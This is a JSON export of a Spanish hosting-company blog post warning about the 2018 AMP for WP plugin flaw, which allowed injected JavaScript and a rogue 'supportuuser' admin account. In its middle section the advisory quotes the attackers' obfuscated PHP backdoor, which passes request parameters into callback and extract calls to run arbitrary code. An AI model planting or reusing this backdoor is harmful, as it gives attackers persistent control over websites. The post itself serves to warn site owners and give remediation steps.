{"id":28071,"date":"2018-11-21T12:50:21","date_gmt":"2018-11-21T10:50:21","guid":{"rendered":"https:\/\/www.hostinet.com\/formacion\/?p=28071"},"modified":"2018-11-21T13:03:14","modified_gmt":"2018-11-21T11:03:14","slug":"plugin-amp-for-wp-seguridad-comprometida-en-wordpress","status":"publish","type":"post","link":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/","title":{"rendered":"Plugin AMP for WP &#8211; Seguridad Comprometida en WordPress"},"content":{"rendered":" <!-- x0 --><div style=\"min-height: 30px; margin-top: 0px; padding-bottom: 7px; z-index: 1;position: relative; float: none;\" class=\"social-container\"><\/div><p>\n\t<img loading=\"lazy\" decoding=\"async\" alt=\"Plugin AMP for WP - Seguridad Comprometida en WordPress\" class=\"aligncenter size-medium wp-image-28075\" height=\"400\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado-600x400.png\" width=\"600\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado-500x333.png 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado-350x233.png 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\n<\/p>\n<p>\n\tTodos los usuarios del <strong>gestor de contenidos WordPress<\/strong> hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero tambi&eacute;n <strong>pueden convertirse en un problema<\/strong>.\n<\/p>\n<p>\n\tEn ocasiones <strong>la seguridad de un plugin puede verse comprometida<\/strong> y si ha sido hackeado y lo estamos usando, nuestro WordPress puede estar en peligro y se hackeado a trav&eacute;s del plugin con el problema de seguridad.\n<\/p>\n<p>\n\tEn este caso, el plugin afectado ha sido <strong><a href=\"https:\/\/wordpress.org\/plugins\/accelerated-mobile-pages\/\" rel=\"nofollow\" target=\"_blank\" title=\"Plugin AMP for WP\">AMP for WP &ndash; Accelerated Mobile Pages<\/a><\/strong>, un plugin que crea p&aacute;ginas <em>AMP<\/em>, un c&oacute;digo desarrollado por Google para <em>&rdquo;aligerar&rdquo;<\/em> los sitios web y que se carguen m&aacute;s r&aacute;pido al visitarlos con dispositivos m&oacute;viles.\n<\/p>\n<p>\n\tDebido a que Google indica que, si un sitio no est&aacute; optimizado para dispositivos m&oacute;viles se ver&iacute;a perjudicado en el SEO, muchos usuarios de WordPress optaron por usar el plugin <strong>AMP for WP<\/strong> para adaptar sus sitios a <strong>AMP<\/strong>.\n<\/p>\n<p>\n\tSeg&uacute;n WordPress.org, <strong>AMP for WP<\/strong> est&aacute; instalado en m&aacute;s de 100.000 sitios activos, as&iacute; que el problema del plugin ha podido afectar a muchos usuarios.\n<\/p>\n<p>\n\tEste problema se une al reciente con el plugin <strong><a href=\"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-wp-gdpr-compliance-comprometido-accion-necesaria\/\" target=\"_blank\" title=\"Plugin WP GDPR Compliance Comprometido \u2013 Acci\u00f3n Necesaria\">WP GDPR Compliance<\/a><\/strong>.<br \/>\n\t&nbsp;\n<\/p>\n<h2>\n\tC&oacute;mo Actua la Vulnerabilidad de AMP for WP<br \/>\n<\/h2>\n<p>\n\t<img loading=\"lazy\" decoding=\"async\" alt=\"C\u00f3mo Actua la Vulnerabilidad de AMP for WP\" class=\"aligncenter size-medium wp-image-28077\" height=\"400\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-vulnerabilidad-600x400.jpg\" width=\"600\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-vulnerabilidad.jpg 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-vulnerabilidad-500x333.jpg 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-vulnerabilidad-350x233.jpg 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\n<\/p>\n<p>\n\tLa vulnerabilidad del plugin <strong>AMP for WP<\/strong>, solo afecta a los sitios que permiten el <strong>registro de usuarios en WordPress<\/strong>.\n<\/p>\n<p>\n\tEs decir, que el usuario ten&iacute;a que estar registrado para poder aprovecharse de la vulnerabilidad, as&iacute; que si vuestro WordPress no tiene activada la opci&oacute;n de <strong>Cualquiera puede registrarse<\/strong>, en los ajustes generales de WordPress, no hab&eacute;is estado en peligro.\n<\/p>\n<p>\n\tPor desgracia no suele ser lo habitual y el registro de usuarios en WordPress es algo muy com&uacute;n y que adem&aacute;s, est&aacute; marcada por defecto, as&iacute; que si no la hab&eacute;is desactivado, lo m&aacute;s normal es que est&eacute; activa.\n<\/p>\n<p>\n\tEn el caso de que un usuario registrado como suscriptor o cualquier otro <em>roll<\/em>, puede llamar a los ganchos AJAX de WordPress e inyectar c&oacute;digo malicioso JavaScript en cualquier parte del sitio.\n<\/p>\n<p>\n\tAdem&aacute;s, se ha detectado que tras a&ntilde;adir el malware, los atacantes pod&iacute;an secuestrar la sesi&oacute;n del navegador del administrador y registrar un nueva cuenta <em>admin<\/em> con el nombre de usuario: <strong>supportuuser<\/strong>.\n<\/p>\n<p>\n\tSi el atacante consigue acceder como administrador, tambi&eacute;n a&ntilde;ade puertas traseras PHP en alg&uacute;n plugin instalado en WordPress:\n<\/p>\n<pre>\r\n<code>@array_diff_ukey(@array((string)@$_REQUEST['vqmode']=&gt;1),\r\n @array((string)stripslashes(@$_REQUEST['map'])=>2),@$_REQUEST['bootup']);\r\n\r\n@extract($_REQUEST);@die($cdate($adate));\r\n<\/code><\/pre>\n<p>\n\tDe esta manera se asegura que, <strong>aunque se elimine la cuenta del administrador falso<\/strong> creada, el atacante <strong>puede volver a inyectar c&oacute;digo malicioso<\/strong>.\n<\/p>\n<p>\n\tPor supuesto, todo esto ha sido lo detectado por los siempre eficaces chicos de Wordfence, pero no significa que la metodolog&iacute;a del ataque no pueda cambiar.\n<\/p>\n<p>\n\tTen&eacute;is m&aacute;s informaci&oacute;n t&eacute;cnica al respecto en <em><a href=\"https:\/\/www.wordfence.com\/blog\/2018\/11\/xss-injection-campaign-exploits-wordpress-amp-plugin\/\" target=\"_blank\" title=\"AMP for WP vulnerabilidad en ingl\u00e9s\">aqui<\/a><\/em> (en ingl&eacute;s).<br \/>\n\t&nbsp;\n<\/p>\n<h2>\n\tQu&eacute; Debo Hacer si tengo Instalado AMP for WP<br \/>\n<\/h2>\n<p>\n\t<img loading=\"lazy\" decoding=\"async\" alt=\"Qu\u00e9 Debo Hacer si tengo Instalado AMP for WP\" class=\"aligncenter size-medium wp-image-28078\" height=\"400\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/actualizar-amp-for-wp-600x400.png\" width=\"600\" srcset=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/actualizar-amp-for-wp.png 600w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/actualizar-amp-for-wp-500x333.png 500w, https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/actualizar-amp-for-wp-350x233.png 350w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/>\n<\/p>\n<p>\n\tLo primero que debes hacer si tienes instalado el plugin <strong>AMP for WP<\/strong>, es <em>actualizarlo<strong>. <\/strong><\/em>\n<\/p>\n<p>\n\tLa versi&oacute;n <strong>0.9.97.20<\/strong> ya est&aacute; parcheada y resuelve el problema, la versiones anteriores no y son susceptibles recibir un ataque.\n<\/p>\n<p>\n\tComo hemos comentado antes, es necesario que el atacante est&eacute; registrado en WordPress para poder lanzar el ataque, si tenemos usuarios registrados, debemos comprobar si tenemos alguna cuenta de administrador que no sea nuestra en WordPress o buscar si tenemos el usuario <strong>supportuuser<\/strong>, en cuyo caso habr&iacute;a que eliminarlo.\n<\/p>\n<p>\n\tDespu&eacute;s podemos revisar nuestro alojamiento en busca de alg&uacute;n malware que se haya podido instalar. Esto podemos hacerlo desde la opci&oacute;n <strong><a href=\"https:\/\/www.hostinet.com\/formacion\/panel-alojamiento\/como-pasar-un-antivirus-en-tu-alojamiento-web-con-cpanel\/\" target=\"_blank\" title=\"C\u00f3mo pasar un Antivirus en tu Alojamiento Web con cPanel\">Esc&aacute;ner de virus<\/a><\/strong>, disponible en <strong>cPanel<\/strong>.\n<\/p>\n<p>\n\tEn cualquier caso, siempre es recomendable mantener WordPress, plugin y <em>themes<\/em> instalados (aunque no est&eacute;n activos) <strong>actualizados<\/strong>.\n<\/p>\n<h2>\n\tHosting WordPress SSD Ultraseguro<br \/>\n<\/h2>\n<p>\n\tEn <strong>Hostinet<\/strong> ofrecemos a nuestros clientes interesados en WordPress los planes de <strong>hosting WordPress<\/strong>.\n<\/p>\n<p>\n\tEstos planes est&aacute;n especialmente pensados en el gestor de contenidos WordPress y cuentan con un <strong>servicio de soporte t&eacute;cnico especializado<\/strong> en WordPress.\n<\/p>\n<p>\n\tSi bien no podemos evitar que un plugin desarrollado por un tercero se vea comprometido y afecte a tu WordPress, si que podemos <strong>revisar tu hosting en buscad de malware instalado<\/strong>.\n<\/p>\n<p>\n\tSi alg&uacute;n atacante a aprovechado alguna vulnerabilidad de alg&uacute;n plugin de WordPress para inyectar <strong>c&oacute;digo malicioso<\/strong>, lo aislaremos y <strong>te pondremos sobre aviso<\/strong> para que puedas reparar el sitio lo antes posible y que el problema te afecte lo menos posible.\n<\/p>\n<p>\n\tEstas son algunas de las opciones m&aacute;s populares de <strong>hosting WordPress SSD<\/strong> que podemos ofrecerte en <strong>Hostinet<\/strong>:\n<\/p>\n<p>\n\t<a href=\"https:\/\/www.hostinet.com\/hosting-wordpress\/\" target=\"_blank\"><img decoding=\"async\" class=\"alignnone size-full\" src=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2026\/03\/banner_hosting_wordpress.jpg\" alt=\"Hosting WordPress\"><\/a><\/p>\n<div style=\"min-height: 30px; margin-top: 0px; padding-bottom: 7px; z-index: 1;position: relative; float: none;\" class=\"social-container\"><\/div> <!-- x1 -->","protected":false},"excerpt":{"rendered":"<p>Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero tambi&eacute;n pueden convertirse en un problema. En ocasiones la seguridad de un plugin puede verse comprometida y si ha sido hackeado y lo estamos usando, nuestro\u2026 <\/p>\n<div class=\"post-more\">\n<p><a class=\"btn button\" href=\"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/\">Sigue leyendo &rarr;<\/a><\/p>\n<\/div>\n","protected":false},"author":14,"featured_media":28075,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1783],"tags":[],"class_list":["post-28071","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Plugin AMP for WP - Seguridad Comprometida en WordPress<\/title>\n<meta name=\"description\" content=\"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Plugin AMP for WP - Seguridad Comprometida en WordPress\" \/>\n<meta property=\"og:description\" content=\"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/\" \/>\n<meta property=\"og:site_name\" content=\"Hostinet\" \/>\n<meta property=\"article:published_time\" content=\"2018-11-21T10:50:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-11-21T11:03:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Marce Medina\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Hostinet\" \/>\n<meta name=\"twitter:site\" content=\"@Hostinet\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Marce Medina\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/\"},\"author\":{\"name\":\"Marce Medina\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#\\\/schema\\\/person\\\/c30f2ada08e5d4836b12fd3782d3958f\"},\"headline\":\"Plugin AMP for WP &#8211; Seguridad Comprometida en WordPress\",\"datePublished\":\"2018-11-21T10:50:21+00:00\",\"dateModified\":\"2018-11-21T11:03:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/\"},\"wordCount\":816,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2018\\\/11\\\/amp-for-wp-hackeado.png\",\"articleSection\":[\"Wordpress\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/\",\"url\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/\",\"name\":\"Plugin AMP for WP - Seguridad Comprometida en WordPress\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2018\\\/11\\\/amp-for-wp-hackeado.png\",\"datePublished\":\"2018-11-21T10:50:21+00:00\",\"dateModified\":\"2018-11-21T11:03:14+00:00\",\"description\":\"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2018\\\/11\\\/amp-for-wp-hackeado.png\",\"contentUrl\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2018\\\/11\\\/amp-for-wp-hackeado.png\",\"width\":600,\"height\":400,\"caption\":\"Plugin AMP for WP - Seguridad Comprometida en WordPress\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wordpress\\\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Wordpress\",\"item\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/category\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Plugin AMP for WP &#8211; Seguridad Comprometida en WordPress\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#website\",\"url\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/\",\"name\":\"Hostinet\",\"description\":\"Hosting y dominios en Espa\u00f1a. La mejor calidad a precios baratos\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#organization\"},\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#organization\",\"name\":\"Hostinet SLU\",\"url\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2016\\\/06\\\/hostinet-logo.jpg\",\"contentUrl\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/wp-content\\\/uploads\\\/2016\\\/06\\\/hostinet-logo.jpg\",\"width\":600,\"height\":245,\"caption\":\"Hostinet SLU\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/Hostinet\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/#\\\/schema\\\/person\\\/c30f2ada08e5d4836b12fd3782d3958f\",\"name\":\"Marce Medina\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g\",\"caption\":\"Marce Medina\"},\"sameAs\":[\"https:\\\/\\\/www.hostinet.com\\\/formacion\\\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Plugin AMP for WP - Seguridad Comprometida en WordPress","description":"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/","og_locale":"es_ES","og_type":"article","og_title":"Plugin AMP for WP - Seguridad Comprometida en WordPress","og_description":"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero","og_url":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/","og_site_name":"Hostinet","article_published_time":"2018-11-21T10:50:21+00:00","article_modified_time":"2018-11-21T11:03:14+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png","type":"image\/png"}],"author":"Marce Medina","twitter_card":"summary_large_image","twitter_creator":"@Hostinet","twitter_site":"@Hostinet","twitter_misc":{"Escrito por":"Marce Medina","Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#article","isPartOf":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/"},"author":{"name":"Marce Medina","@id":"https:\/\/www.hostinet.com\/formacion\/#\/schema\/person\/c30f2ada08e5d4836b12fd3782d3958f"},"headline":"Plugin AMP for WP &#8211; Seguridad Comprometida en WordPress","datePublished":"2018-11-21T10:50:21+00:00","dateModified":"2018-11-21T11:03:14+00:00","mainEntityOfPage":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/"},"wordCount":816,"commentCount":0,"publisher":{"@id":"https:\/\/www.hostinet.com\/formacion\/#organization"},"image":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png","articleSection":["Wordpress"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/","url":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/","name":"Plugin AMP for WP - Seguridad Comprometida en WordPress","isPartOf":{"@id":"https:\/\/www.hostinet.com\/formacion\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#primaryimage"},"image":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#primaryimage"},"thumbnailUrl":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png","datePublished":"2018-11-21T10:50:21+00:00","dateModified":"2018-11-21T11:03:14+00:00","description":"Todos los usuarios del gestor de contenidos WordPress hacen uso de alg&uacute;n plugin. Los plugins son una constante y una ventaja en WordPress, pero","breadcrumb":{"@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#primaryimage","url":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png","contentUrl":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2018\/11\/amp-for-wp-hackeado.png","width":600,"height":400,"caption":"Plugin AMP for WP - Seguridad Comprometida en WordPress"},{"@type":"BreadcrumbList","@id":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-amp-for-wp-seguridad-comprometida-en-wordpress\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.hostinet.com\/formacion\/"},{"@type":"ListItem","position":2,"name":"Wordpress","item":"https:\/\/www.hostinet.com\/formacion\/category\/wordpress\/"},{"@type":"ListItem","position":3,"name":"Plugin AMP for WP &#8211; Seguridad Comprometida en WordPress"}]},{"@type":"WebSite","@id":"https:\/\/www.hostinet.com\/formacion\/#website","url":"https:\/\/www.hostinet.com\/formacion\/","name":"Hostinet","description":"Hosting y dominios en Espa\u00f1a. La mejor calidad a precios baratos","publisher":{"@id":"https:\/\/www.hostinet.com\/formacion\/#organization"},"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.hostinet.com\/formacion\/#organization","name":"Hostinet SLU","url":"https:\/\/www.hostinet.com\/formacion\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.hostinet.com\/formacion\/#\/schema\/logo\/image\/","url":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2016\/06\/hostinet-logo.jpg","contentUrl":"https:\/\/www.hostinet.com\/formacion\/wp-content\/uploads\/2016\/06\/hostinet-logo.jpg","width":600,"height":245,"caption":"Hostinet SLU"},"image":{"@id":"https:\/\/www.hostinet.com\/formacion\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/Hostinet"]},{"@type":"Person","@id":"https:\/\/www.hostinet.com\/formacion\/#\/schema\/person\/c30f2ada08e5d4836b12fd3782d3958f","name":"Marce Medina","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0a5f9094a8c7354a8f35685f8ee6e2089cfd977a0e269cab521f33c67ea47559?s=96&r=g","caption":"Marce Medina"},"sameAs":["https:\/\/www.hostinet.com\/formacion\/"]}]}},"_links":{"self":[{"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/posts\/28071","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/comments?post=28071"}],"version-history":[{"count":4,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/posts\/28071\/revisions"}],"predecessor-version":[{"id":28079,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/posts\/28071\/revisions\/28079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/media\/28075"}],"wp:attachment":[{"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/media?parent=28071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/categories?post=28071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hostinet.com\/formacion\/wp-json\/wp\/v2\/tags?post=28071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}